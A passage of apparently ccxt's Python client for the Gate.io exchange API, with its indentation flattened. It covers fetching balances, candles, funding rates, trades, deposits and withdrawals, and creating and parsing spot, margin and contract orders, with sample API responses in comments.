# order_margin: "0",
# point: "0",
# history: {
# dnw: "1",
# pnl: "0",
# refr: "0",
# point_fee: "0",
# point_dnw: "0",
# settle: "0",
# settle_fee: "0",
# point_refr: "0",
# fee: "0",
# },
# unrealised_pnl: "0",
# total: "1",
# available: "1",
# currency: "USDT",
# position_margin: "0",
# user: "6333333",
# }
#
result = {
'info': response,
}
crossMargin = marginMode == 'cross_margin'
margin = marginMode == 'margin'
data = response
if 'balances' in data: # True for cross_margin
flatBalances = []
balances = self.safe_value(data, 'balances', [])
# inject currency and create an artificial balance object
            # so it can follow the existing flow
keys = list(balances.keys())
for i in range(0, len(keys)):
currencyId = keys[i]
content = balances[currencyId]
content['currency'] = currencyId
flatBalances.append(content)
data = flatBalances
for i in range(0, len(data)):
entry = data[i]
if margin and not crossMargin:
marketId = self.safe_string(entry, 'currency_pair')
symbol = self.safe_symbol(marketId, None, '_')
base = self.safe_value(entry, 'base', {})
quote = self.safe_value(entry, 'quote', {})
baseCode = self.safe_currency_code(self.safe_string(base, 'currency', {}))
quoteCode = self.safe_currency_code(self.safe_string(quote, 'currency', {}))
subResult = {}
subResult[baseCode] = self.fetch_balance_helper(base)
subResult[quoteCode] = self.fetch_balance_helper(quote)
result[symbol] = self.safe_balance(subResult)
else:
code = self.safe_currency_code(self.safe_string(entry, 'currency', {}))
result[code] = self.fetch_balance_helper(entry)
return result if (margin and not crossMargin) else self.safe_balance(result)
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
price = self.safe_string(params, 'price')
request = {}
request, params = self.prepare_request(market, None, params)
request['interval'] = self.timeframes[timeframe]
method = 'publicSpotGetCandlesticks'
if market['contract']:
maxLimit = 1999
limit = maxLimit if (limit is None) else min(limit, maxLimit)
if market['future']:
method = 'publicDeliveryGetSettleCandlesticks'
elif market['swap']:
method = 'publicFuturesGetSettleCandlesticks'
isMark = (price == 'mark')
isIndex = (price == 'index')
if isMark or isIndex:
request['contract'] = price + '_' + market['id']
params = self.omit(params, 'price')
else:
maxLimit = 1000
limit = maxLimit if (limit is None) else min(limit, maxLimit)
request['limit'] = limit
if since is not None:
duration = self.parse_timeframe(timeframe)
request['from'] = int(since / 1000)
toTimestamp = self.sum(request['from'], limit * duration - 1)
currentTimestamp = self.seconds()
request['to'] = min(toTimestamp, currentTimestamp)
response = await getattr(self, method)(self.extend(request, params))
return self.parse_ohlcvs(response, market, timeframe, since, limit)
async def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'mark',
}
return await self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
async def fetch_funding_rate_history(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument')
await self.load_markets()
market = self.market(symbol)
if not market['swap']:
raise BadSymbol(self.id + ' fetchFundingRateHistory() supports swap contracts only')
request, query = self.prepare_request(market, None, params)
if limit is not None:
request['limit'] = limit
method = 'publicFuturesGetSettleFundingRate'
response = await getattr(self, method)(self.extend(request, query))
#
# {
# "r": "0.00063521",
# "t": "1621267200000",
# }
#
rates = []
for i in range(0, len(response)):
entry = response[i]
timestamp = self.safe_timestamp(entry, 't')
rates.append({
'info': entry,
'symbol': symbol,
'fundingRate': self.safe_number(entry, 'r'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
sorted = self.sort_by(rates, 'timestamp')
return self.filter_by_symbol_since_limit(sorted, market['symbol'], since, limit)
async def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
request = {
'price': 'index',
}
return await self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def parse_ohlcv(self, ohlcv, market=None):
#
# Spot market candles
#
# [
# "1626163200", # Unix timestamp in seconds
# "346711.933138181617", # Trading volume
# "33165.23", # Close price
# "33260", # Highest price
# "33117.6", # Lowest price
# "33184.47" # Open price
# ]
#
# Mark and Index price candles
#
# {
# "t":1632873600, # Unix timestamp in seconds
# "o": "41025", # Open price
# "h": "41882.17", # Highest price
# "c": "41776.92", # Close price
# "l": "40783.94" # Lowest price
# }
#
if isinstance(ohlcv, list):
return [
self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds
self.safe_number(ohlcv, 5), # open price
self.safe_number(ohlcv, 3), # highest price
self.safe_number(ohlcv, 4), # lowest price
self.safe_number(ohlcv, 2), # close price
self.safe_number(ohlcv, 1), # trading volume
]
else:
# Mark and Index price candles
return [
self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds
self.safe_number(ohlcv, 'o'), # open price
self.safe_number(ohlcv, 'h'), # highest price
self.safe_number(ohlcv, 'l'), # lowest price
self.safe_number(ohlcv, 'c'), # close price
self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price
]
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
#
# spot
#
# request = {
# 'currency_pair': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list starting point using the id of the last record in previous list-query results
# 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id
# }
#
# swap, future
#
# request = {
# 'settle': market['settleId'],
# 'contract': market['id'],
# 'limit': limit, # maximum number of records to be returned in a single list
# 'last_id': 'id', # specify list starting point using the id of the last record in previous list-query results
# 'from': since / 1000, # starting time in seconds, if not specified, to and limit will be used to limit response items
# 'to': self.seconds(), # end time in seconds, default to current time
# }
#
request, query = self.prepare_request(market, None, params)
method = self.get_supported_mapping(market['type'], {
'spot': 'publicSpotGetTrades',
'margin': 'publicSpotGetTrades',
'swap': 'publicFuturesGetSettleTrades',
'future': 'publicDeliveryGetSettleTrades',
})
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None and (market['contract']):
request['from'] = int(since / 1000)
response = await getattr(self, method)(self.extend(request, query))
#
# spot
#
# [
# {
# id: "1852958144",
# create_time: "1634673259",
# create_time_ms: "1634673259378.105000",
# currency_pair: "ADA_USDT",
# side: "sell",
# amount: "307.078",
# price: "2.104",
# }
# ]
#
# perpetual swap
#
# [
# {
# size: "2",
# id: "2522911",
# create_time_ms: "1634673380.182",
# create_time: "1634673380.182",
# contract: "ADA_USDT",
# price: "2.10486",
# }
# ]
#
return self.parse_trades(response, market, since, limit)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
"""
Fetch personal trading history
:param str symbol: The symbol for the market to fetch trades for
:param int since: The earliest timestamp, in ms, that fetched trades were made
:param int limit: The max number of trades to fetch
:param dict params: Exchange specific parameters
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param str params['type']: 'spot', 'swap', or 'future', if not provided self.options['defaultType'] is used
:param int params['till']: The latest timestamp, in ms, that fetched trades were made
:param int params['page']: *spot only* Page number
:param str params['order_id']: *spot only* Filter trades with specified order ID. symbol is also required if this field is present
:param str params['order']: *contract only* Futures order ID, return related data only if specified
:param int params['offset']: *contract only* list offset, starting from 0
:param str params['last_id']: *contract only* specify list starting point using the id of the last record in previous list-query results
:param int params['count_total']: *contract only* whether to return total number matched, default to 0(no return)
:returns: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
type = None
marginMode = None
request = {}
market = self.market(symbol) if (symbol is not None) else None
till = self.safe_number(params, 'till')
params = self.omit(params, 'till')
type, params = self.handle_market_type_and_params('fetchMyTrades', market, params)
contract = (type == 'swap') or (type == 'future')
if contract:
request, params = self.prepare_request(market, type, params)
else:
if market is not None:
request['currency_pair'] = market['id'] # Should always be set for non-stop
marginMode, params = self.get_margin_mode(False, params)
request['account'] = marginMode
if limit is not None:
request['limit'] = limit # default 100, max 1000
if since is not None:
request['from'] = int(since / 1000)
if till is not None:
request['to'] = int(till / 1000)
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGetMyTrades',
'margin': 'privateSpotGetMyTrades',
'swap': 'privateFuturesGetSettleMyTrades',
'future': 'privateDeliveryGetSettleMyTrades',
})
response = await getattr(self, method)(self.extend(request, params))
#
# spot
#
# [
# {
# "id": "2876130500",
# "create_time": "1645464610",
# "create_time_ms": "1645464610777.399200",
# "currency_pair": "DOGE_USDT",
# "side": "sell",
# "role": "taker",
# "amount": "10.97",
# "price": "0.137384",
# "order_id": "125924049993",
# "fee": "0.00301420496",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0"
# }
# ]
#
# perpetual swap
#
# [
# {
# "size": -5,
# "order_id": "130264979823",
# "id": 26884791,
# "role": "taker",
# "create_time": 1645465199.5472,
# "contract": "DOGE_USDT",
# "price": "0.136888"
# }
# ]
#
# future
#
# [
# {
# "id": 121234231,
# "create_time": 1514764800.123,
# "contract": "BTC_USDT",
# "order_id": "21893289839",
# "size": 100,
# "price": "100.123",
# "role": "taker"
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def parse_trade(self, trade, market=None):
#
# public
#
# {
# "id": "1334253759",
# "create_time": "1626342738",
# "create_time_ms": "1626342738331.497000",
# "currency_pair": "BTC_USDT",
# "side": "sell",
# "amount": "0.0022",
# "price": "32452.16"
# }
#
# public ws
#
# {
# id: 221994511,
# time: 1580311438.618647,
# price: '9309',
# amount: '0.0019',
# type: 'sell'
# }
#
# spot rest
#
# {
# "id": "2876130500",
# "create_time": "1645464610",
# "create_time_ms": "1645464610777.399200",
# "currency_pair": "DOGE_USDT",
# "side": "sell",
# "role": "taker",
# "amount": "10.97",
# "price": "0.137384",
# "order_id": "125924049993",
# "fee": "0.00301420496",
# "fee_currency": "USDT",
# "point_fee": "0","gt_fee":"0"
# }
#
# perpetual swap rest
#
# {
# "size": -5,
# "order_id": "130264979823",
# "id": 26884791,
# "role": "taker",
# "create_time": 1645465199.5472,
# "contract": "DOGE_USDT",
# "price": "0.136888"
# }
#
# future rest
#
# {
# "id": 121234231,
# "create_time": 1514764800.123,
# "contract": "BTC_USDT",
# "order_id": "21893289839",
# "size": 100,
# "price": "100.123",
# "role": "taker"
# }
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp_2(trade, 'time', 'create_time')
timestamp = self.safe_integer(trade, 'create_time_ms', timestamp)
marketId = self.safe_string_2(trade, 'currency_pair', 'contract')
symbol = self.safe_symbol(marketId, market)
amountString = self.safe_string_2(trade, 'amount', 'size')
priceString = self.safe_string(trade, 'price')
contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy'
amountString = Precise.string_abs(amountString)
side = self.safe_string_2(trade, 'side', 'type', contractSide)
orderId = self.safe_string(trade, 'order_id')
gtFee = self.safe_string(trade, 'gt_fee')
feeCurrency = None
feeCostString = None
if gtFee == '0':
feeCurrency = self.safe_string(trade, 'fee_currency')
feeCostString = self.safe_string(trade, 'fee')
else:
feeCurrency = 'GT'
feeCostString = gtFee
fee = {
'cost': feeCostString,
'currency': feeCurrency,
}
takerOrMaker = self.safe_string(trade, 'role')
return self.safe_trade({
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': None,
'side': side,
'takerOrMaker': takerOrMaker,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
start = int(since / 1000)
request['from'] = start
request['to'] = self.sum(start, 30 * 24 * 60 * 60)
response = await self.privateWalletGetDeposits(self.extend(request, params))
return self.parse_transactions(response, currency)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit
if since is not None:
start = int(since / 1000)
request['from'] = start
request['to'] = self.sum(start, 30 * 24 * 60 * 60)
response = await self.privateWalletGetWithdrawals(self.extend(request, params))
return self.parse_transactions(response, currency)
async def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
'address': address,
'amount': self.currency_to_precision(code, amount),
}
if tag is not None:
request['memo'] = tag
networks = self.safe_value(self.options, 'networks', {})
network = self.safe_string_upper(params, 'network') # this line allows the user to specify either ERC20 or ETH
network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias
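# e.g.(hypothetical mapping) if self.options['networks'] contains {'ERC20': 'ETH'},
# then params={'network': 'ERC20'} resolves to request['chain'] = 'eth' below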
if network is not None:
request['chain'] = network
params = self.omit(params, 'network')
response = await self.privateWithdrawalsPost(self.extend(request, params))
#
# {
# "id": "w13389675",
# "currency": "USDT",
# "amount": "50",
# "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1",
# "memo": null
# }
#
return self.parse_transaction(response, currency)
def parse_transaction_status(self, status):
statuses = {
'PEND': 'pending',
'REQUEST': 'pending',
'DMOVE': 'pending',
'CANCEL': 'failed',
'DONE': 'ok',
'BCODE': 'ok', # GateCode withdrawal
}
return self.safe_string(statuses, status, status)
def parse_transaction_type(self, type):
types = {
'd': 'deposit',
'w': 'withdrawal',
}
return self.safe_string(types, type, type)
def parse_transaction(self, transaction, currency=None):
#
# deposits
#
# {
# "id": "d33361395",
# "currency": "USDT_TRX",
# "address": "TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z",
# "amount": "100",
# "txid": "ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0",
# "timestamp": "1626345819",
# "status": "DONE",
# "memo": ""
# }
#
# withdraw
#
# {
# "id": "w13389675",
# "currency": "USDT",
# "amount": "50",
# "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1",
# "memo": null
# }
#
id = self.safe_string(transaction, 'id')
type = None
amount = self.safe_string(transaction, 'amount')
if id[0] == 'b':
# GateCode handling
type = 'deposit' if Precise.string_gt(amount, '0') else 'withdrawal'
amount = Precise.string_abs(amount)
elif id is not None:
type = self.parse_transaction_type(id[0])
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
txid = self.safe_string(transaction, 'txid')
rawStatus = self.safe_string(transaction, 'status')
status = self.parse_transaction_status(rawStatus)
address = self.safe_string(transaction, 'address')
fee = self.safe_number(transaction, 'fee')
tag = self.safe_string(transaction, 'memo')
if tag == '':
tag = None
timestamp = self.safe_timestamp(transaction, 'timestamp')
return {
'info': transaction,
'id': id,
'txid': txid,
'currency': code,
'amount': self.parse_number(amount),
'network': None,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'status': status,
'type': type,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'updated': None,
'fee': fee,
}
async def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
Create an order on the exchange
:param str symbol: Unified CCXT market symbol
:param str type: "limit" or "market" *"market" is contract only*
:param str side: "buy" or "sell"
:param float amount: the amount of currency to trade
:param float price: *ignored in "market" orders* the price at which the order is to be fulfilled, in units of the quote currency
:param dict params: Extra parameters specific to the exchange API endpoint
:param float params['stopPrice']: The price at which a trigger order is triggered at
:param str params['timeInForce']: "GTC", "IOC", or "PO"
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param int params['iceberg']: Amount to display for the iceberg order, Null or 0 for normal orders, Set to -1 to hide the order completely
:param str params['text']: User defined information
:param str params['account']: *spot and margin only* "spot", "margin" or "cross_margin"
:param bool params['auto_borrow']: *margin only* Used in margin or cross margin trading to allow automatic loan of insufficient amount if balance is not enough
:param str params['settle']: *contract only* Unified Currency Code for settle currency
:param bool params['reduceOnly']: *contract only* Indicates if this order is to reduce the size of a position
:param bool params['close']: *contract only* Set as True to close the position, with size set to 0
:param bool params['auto_size']: *contract only* Set side to close dual-mode position, close_long closes the long side, while close_short the short one, size also needs to be set to 0
:returns: `An order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
market = self.market(symbol)
contract = market['contract']
stopPrice = self.safe_number(params, 'stopPrice')
methodTail = 'Orders'
reduceOnly = self.safe_value_2(params, 'reduce_only', 'reduceOnly')
defaultTimeInForce = self.safe_value_2(params, 'tif', 'time_in_force', 'gtc')
timeInForce = self.safe_value(params, 'timeInForce', defaultTimeInForce)
postOnly = False
type, postOnly, timeInForce, params = self.is_post_only(type, timeInForce, None, params)
params = self.omit(params, ['stopPrice', 'reduce_only', 'reduceOnly', 'tif', 'time_in_force', 'timeInForce'])
if postOnly:
timeInForce = 'poc'
isLimitOrder = (type == 'limit')
isMarketOrder = (type == 'market')
if isLimitOrder and price is None:
raise ArgumentsRequired(self.id + ' createOrder() requires a price argument for ' + type + ' orders')
if contract:
amountToPrecision = self.amount_to_precision(symbol, amount)
signedAmount = Precise.string_neg(amountToPrecision) if (side == 'sell') else amountToPrecision
amount = int(signedAmount)
if isMarketOrder:
timeInForce = 'ioc'
price = 0
elif not isLimitOrder:
# Gateio doesn't have market orders for spot
raise InvalidOrder(self.id + ' createOrder() does not support ' + type + ' orders for ' + market['type'] + ' markets')
request = None
trigger = self.safe_value(params, 'trigger')
if stopPrice is None and trigger is None:
if contract:
# contract order
request = {
'contract': market['id'], # filled in prepareRequest above
'size': amount, # int64, positive = bid, negative = ask
# 'iceberg': 0, # int64, display size for iceberg order, 0 for non-iceberg, note that you will have to pay the taker fee for the hidden size
'price': self.price_to_precision(symbol, price), # 0 for market order with tif set as ioc
# 'close': False, # True to close the position, with size set to 0
# 'reduce_only': False, # set as True to create a reduce-only order
# 'tif': 'gtc', # gtc, ioc, poc PendingOrCancelled == postOnly order
# 'text': clientOrderId, # 't-abcdef1234567890',
# 'auto_size': '', # close_long, close_short, note size also needs to be set to 0
'settle': market['settleId'], # filled in prepareRequest above
}
if reduceOnly is not None:
request['reduce_only'] = reduceOnly
if timeInForce is not None:
request['tif'] = timeInForce
else:
marginMode = None
marginMode, params = self.get_margin_mode(False, params)
# spot order
request = {
# 'text': clientOrderId, # 't-abcdef1234567890',
'currency_pair': market['id'], # filled in prepareRequest above
'type': type,
'account': marginMode, # 'spot', 'margin', 'cross_margin'
'side': side,
'amount': self.amount_to_precision(symbol, amount),
'price': self.price_to_precision(symbol, price),
# 'time_in_force': 'gtc', # gtc, ioc, poc PendingOrCancelled == postOnly order
# 'iceberg': 0, # amount to display for the iceberg order, null or 0 for normal orders, set to -1 to hide the order completely
# 'auto_borrow': False, # used in margin or cross margin trading to allow automatic loan of insufficient amount if balance is not enough
# 'auto_repay': False, # automatic repayment for automatic borrow loan generated by cross margin order, disabled by default
}
if timeInForce is not None:
request['time_in_force'] = timeInForce
clientOrderId = self.safe_string_2(params, 'text', 'clientOrderId')
if clientOrderId is not None:
# user-defined, must follow the rules if not empty
# prefixed with t-
# no longer than 28 bytes without t- prefix
# can only include 0-9, A-Z, a-z, underscores(_), hyphens(-) or dots(.)
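# e.g. a hypothetical valid value: 'grid-bot_001.a', sent to the exchange as 't-grid-bot_001.a' below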
if len(clientOrderId) > 28:
raise BadRequest(self.id + ' createOrder() clientOrderId or text param must be up to 28 characters')
params = self.omit(params, ['text', 'clientOrderId'])
if clientOrderId[0] != 't':
clientOrderId = 't-' + clientOrderId
request['text'] = clientOrderId
else:
if contract:
# contract conditional order
rule = 1 if (side == 'buy') else 2
request = {
'initial': {
'contract': market['id'],
'size': amount, # positive = buy, negative = sell, set to 0 to close the position
'price': self.price_to_precision(symbol, price), # set to 0 to use market price
# 'close': False, # set to True if trying to close the position
# 'tif': 'gtc', # gtc, ioc, if using market price, only ioc is supported
# 'text': clientOrderId, # web, api, app
# 'reduce_only': False,
},
'trigger': {
# 'strategy_type': 0, # 0 = by price, 1 = by price gap, only 0 is supported currently
# 'price_type': 0, # 0 latest deal price, 1 mark price, 2 index price
'price': self.price_to_precision(symbol, stopPrice), # price or gap
'rule': rule, # 1 means price_type >= price, 2 means price_type <= price
# 'expiration': expiration, how many seconds to wait for the condition to be triggered before cancelling the order
},
'settle': market['settleId'],
}
expiration = self.safe_integer(params, 'expiration')
if expiration is not None:
request['trigger']['expiration'] = expiration
params = self.omit(params, 'expiration')
if reduceOnly is not None:
request['initial']['reduce_only'] = reduceOnly
if timeInForce is not None:
request['initial']['tif'] = timeInForce
else:
# spot conditional order
options = self.safe_value(self.options, 'createOrder', {})
marginMode = None
marginMode, params = self.get_margin_mode(True, params)
defaultExpiration = self.safe_integer(options, 'expiration')
expiration = self.safe_integer(params, 'expiration', defaultExpiration)
rule = '>=' if (side == 'buy') else '<='
triggerPrice = self.safe_value(trigger, 'price', stopPrice)
request = {
'trigger': {
'price': self.price_to_precision(symbol, triggerPrice),
'rule': rule, # >= triggered when market price larger than or equal to price field, <= triggered when market price less than or equal to price field
'expiration': expiration, # required, how long(in seconds) to wait for the condition to be triggered before cancelling the order
},
'put': {
'type': type,
'side': side,
'price': self.price_to_precision(symbol, price),
'amount': self.amount_to_precision(symbol, amount),
'account': marginMode,
'time_in_force': timeInForce, # gtc, ioc for taker only
},
'market': market['id'],
}
methodTail = 'PriceOrders'
method = self.get_supported_mapping(market['type'], {
'spot': 'privateSpotPost' + methodTail,
'margin': 'privateSpotPost' + methodTail,
'swap': 'privateFuturesPostSettle' + methodTail,
'future': 'privateDeliveryPostSettle' + methodTail,
})
response = await getattr(self, method)(self.deep_extend(request, params))
#
# spot
#
# {
# "id": "95282841887",
# "text": "apiv4",
# "create_time": "1637383156",
# "update_time": "1637383156",
# "create_time_ms": 1637383156017,
# "update_time_ms": 1637383156017,
# "status": "open",
# "currency_pair": "ETH_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.01",
# "price": "3500",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.01",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "ETH",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
# spot conditional
#
# {"id": 5891843}
#
# future and perpetual swaps
#
# {
# "id": 95938572327,
# "contract": "ETH_USDT",
# "mkfr": "0",
# "tkfr": "0.0005",
# "tif": "gtc",
# "is_reduce_only": False,
# "create_time": 1637384600.08,
# "price": "3000",
# "size": 1,
# "refr": "0",
# "left": 1,
# "text": "api",
# "fill_price": "0",
# "user": 2436035,
# "status": "open",
# "is_liq": False,
# "refu": 0,
# "is_close": False,
# "iceberg": 0
# }
#
# futures and perpetual swaps conditionals
#
# {"id": 7615567}
#
return self.parse_order(response, market)
def parse_order_status(self, status):
statuses = {
'_new': 'open',
'filled': 'closed',
'cancelled': 'canceled',
'liquidated': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# SPOT
# createOrder/cancelOrder/fetchOrder
#
# {
# "id": "62364648575",
# "text": "apiv4",
# "create_time": "1626354834",
# "update_time": "1626354834",
# "create_time_ms": "1626354833544",
# "update_time_ms": "1626354833544",
# "status": "open",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.0001",
# "price": "30000",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.0001",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "BTC",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": True,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
# SPOT TRIGGER ORDERS
# createOrder
#
# {
# "id": 12604556
# }
#
# fetchOrder/cancelOrder
#
# {
# "market": "ADA_USDT",
# "user": 6392049,
# "trigger": {
# "price": "1.08", # stopPrice
# "rule": "\u003e=",
# "expiration": 86400
# },
# "put": {
# "type": "limit",
# "side": "buy",
# "price": "1.08", # order price
# "amount": "1.00000000000000000000",
# "account": "normal",
# "time_in_force": "gtc"
# },
# "id": 71639298,
# "ctime": 1643945985,
# "status": "open"
# }
#
# FUTURE AND SWAP
# createOrder/cancelOrder/fetchOrder
#
# {
# "id": 123028481731,
# "contract": "ADA_USDT",
# "mkfr": "-0.00005",
# "tkfr": "0.00048",
# "tif": "ioc",
# "is_reduce_only": False,
# "create_time": 1643950262.68,
# "finish_time": 1643950262.68,
# "price": "0",
# "size": 1,
# "refr": "0",
# "left":0,
# "text": "api",
# "fill_price": "1.05273",
# "user":6329238,
# "finish_as": "filled",
# "status": "finished",
# "is_liq": False,
# "refu":0,
# "is_close": False,
# "iceberg": 0
# }
#
# TRIGGER ORDERS(FUTURE AND SWAP)
# createOrder
#
# {
# "id": 12604556
# }
#
# fetchOrder/cancelOrder
#
# {
# "user": 6320300,
# "trigger": {
# "strategy_type": 0,
# "price_type": 0,
# "price": "1.03", # stopPrice
# "rule": 2,
# "expiration": 0
# },
# "initial": {
# "contract": "ADA_USDT",
# "size": -1,
# "price": "1.02",
# "tif": "gtc",
# "text": "",
# "iceberg": 0,
# "is_close": False,
# "is_reduce_only": False,
# "auto_size": ""
# },
# "id": 126393906,
# "trade_id": 0,
# "status": "open",
# "reason": "",
# "create_time": 1643953482,
# "finish_time": 1643953482,
# "is_stop_order": False,
# "stop_trigger": {
# "rule": 0,
# "trigger_price": "",
# "order_price": ""
# },
# "me_order_id": 0,
# "order_type": ""
# }
#
put = self.safe_value_2(order, 'put', 'initial')
trigger = self.safe_value(order, 'trigger')
contract = self.safe_string(put, 'contract')
type = self.safe_string(put, 'type')
timeInForce = self.safe_string_upper_2(put, 'time_in_force', 'tif')
amount = self.safe_string_2(put, 'amount', 'size')
side = self.safe_string(put, 'side')
price = self.safe_string(put, 'price')
contract = self.safe_string(order, 'contract', contract)
type = self.safe_string(order, 'type', type)
timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif', timeInForce)
if timeInForce == 'POC':
timeInForce = 'PO'
postOnly = (timeInForce == 'PO')
amount = self.safe_string_2(order, 'amount', 'size', amount)
side = self.safe_string(order, 'side', side)
price = self.safe_string(order, 'price', price)
remaining = self.safe_string(order, 'left')
filled = Precise.string_sub(amount, remaining)
cost = self.safe_string(order, 'filled_total')
rawStatus = None
average = None
if put:
remaining = amount
filled = '0'
cost = '0'
if contract:
isMarketOrder = Precise.string_equals(price, '0') and (timeInForce == 'IOC')
type = 'market' if isMarketOrder else 'limit'
side = 'buy' if Precise.string_gt(amount, '0') else 'sell'
rawStatus = self.safe_string(order, 'finish_as', 'open')
average = self.safe_number(order, 'fill_price')
else:
rawStatus = self.safe_string(order, 'status')
timestamp = self.safe_integer(order, 'create_time_ms')
if timestamp is None:
timestamp = self.safe_timestamp_2(order, 'create_time', 'ctime')
lastTradeTimestamp = self.safe_integer(order, 'update_time_ms')
if lastTradeTimestamp is None:
lastTradeTimestamp = self.safe_timestamp_2(order, 'update_time', 'finish_time')
exchangeSymbol = self.safe_string_2(order, 'currency_pair', 'market', contract)
# Everything below this comment(up to the return) is related to fees
fees = []
gtFee = self.safe_string(order, 'gt_fee')
if gtFee:
fees.append({
'currency': 'GT',
'cost': gtFee,
})
fee = self.safe_string(order, 'fee')
if fee:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')),
'cost': fee,
})
rebate = self.safe_string(order, 'rebated_fee')
if rebate:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')),
'cost': Precise.string_neg(rebate),
})
numFeeCurrencies = len(fees)
multipleFeeCurrencies = numFeeCurrencies > 1
status = self.parse_order_status(rawStatus)
return self.safe_order({
'id': self.safe_string(order, 'id'),
'clientOrderId': self.safe_string(order, 'text'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'status': status,
'symbol': self.safe_symbol(exchangeSymbol),
'type': type,
'timeInForce': timeInForce,
'postOnly': postOnly,
'side': side,
'price': self.parse_number(price),
'stopPrice': self.safe_number(trigger, 'price'),
'average': average,
'amount': self.parse_number(Precise.string_abs(amount)),
'cost': Precise.string_abs(cost),
'filled': self.parse_number(Precise.string_abs(filled)),
'remaining': self.parse_number(Precise.string_abs(remaining)),
'fee': None if multipleFeeCurrencies else self.safe_value(fees, 0),
'fees': fees if multipleFeeCurrencies else [],
'trades': None,
'info': order,
}, market)
async def create_reduce_only_order(self, symbol, type, side, amount, price=None, params={}):
request = {
'reduceOnly': True,
}
return await self.create_order(symbol, type, side, amount, price, self.extend(request, params))
async def fetch_order(self, id, symbol=None, params={}):
"""
Retrieves information on an order
:param str id: Order id
:param str symbol: Unified market symbol, *required for spot and margin*
:param dict params: Parameters specified by the exchange api
:param bool params['stop']: True if the order being fetched is a trigger order
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param str params['type']: 'spot', 'swap', or 'future', if not provided self.options['defaultType'] is used
:param str params['settle']: 'btc' or 'usdt' - settle currency for perpetual swap and future - market settle currency is used if symbol is not None, default="usdt" for swap and "btc" for future
:returns: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
stop = self.safe_value_2(params, 'is_stop_order', 'stop', False)
params = self.omit(params, ['is_stop_order', 'stop'])
clientOrderId = self.safe_string_2(params, 'text', 'clientOrderId')
orderId = id
if clientOrderId is not None:
params = self.omit(params, ['text', 'clientOrderId'])
if clientOrderId[0] != 't':
clientOrderId = 't-' + clientOrderId
orderId = clientOrderId
market = None if (symbol is None) else self.market(symbol)
type, query = self.handle_market_type_and_params('fetchOrder', market, params)
contract = (type == 'swap') or (type == 'future')
